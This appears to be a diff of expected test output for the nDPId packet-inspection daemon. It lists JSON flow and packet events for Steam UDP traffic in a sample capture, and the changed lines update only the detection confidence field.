00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qjAqLyVRRyRqrJhaYkALAccVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1357332164823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164823,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWScAAIARjXlFHJGqwKi8lWmJsmEANPbVVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA7fJcQrwAAAA="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1357332164834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164834,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSgAAIARxIxEjlskwKi8lWmJsmEANPCBVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAzHF5K\/4AAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1357332164836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164836,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYsALLOPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1357332164836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164836,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw\/AqLyVSKU9u7JhaYoALFeBVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1357332164837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164837,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qbAqLyVRRyRrLJhaYkALAcaVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1357332164837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164837,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYsALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1357332164869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164869,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSkAAIARjXVFHJGswKi8lWmJsmEANAokVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAumV7f70AAAA="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1357332164873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164873,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSoAAIAR3dxIpT27wKi8lWmKsmEANMZ2VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAjNtWHqQAAAA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1357332164876,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164876,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSsAAIAROeySQpgNwKi8lWmKsmEANDIHVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAhmUJFOgAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1357332164886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164886,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb\/AqLyVRI5bIrJhaYkALD4yVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1357332164887,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164887,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAROR3AqLyVy025BLJhaYkALFmQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1357332164888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164888,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARBC7AqLyVRI50s7JhaYkALCShVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1357332164888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164888,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw7AqLyVSKU9vLJhaYkALFeBVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1357332164892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164892,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSwAAIAROeySQpgMwKi8lWmLsmEANKu+VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAMlh+aU0BAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1357332164912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164912,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS0AAIARqvhEjnSzwKi8lWmJsmEANEAeVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAHUr6J8MAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1357332164925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164925,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS4AAIAROeqSQpgMwKi8lWmKsmEANAVPVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAJg+KI\/QAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1357332164927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164927,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS8AAIAR3dZIpT28wKi8lWmJsmEANMuoVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAUb2BCq8AAAA="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 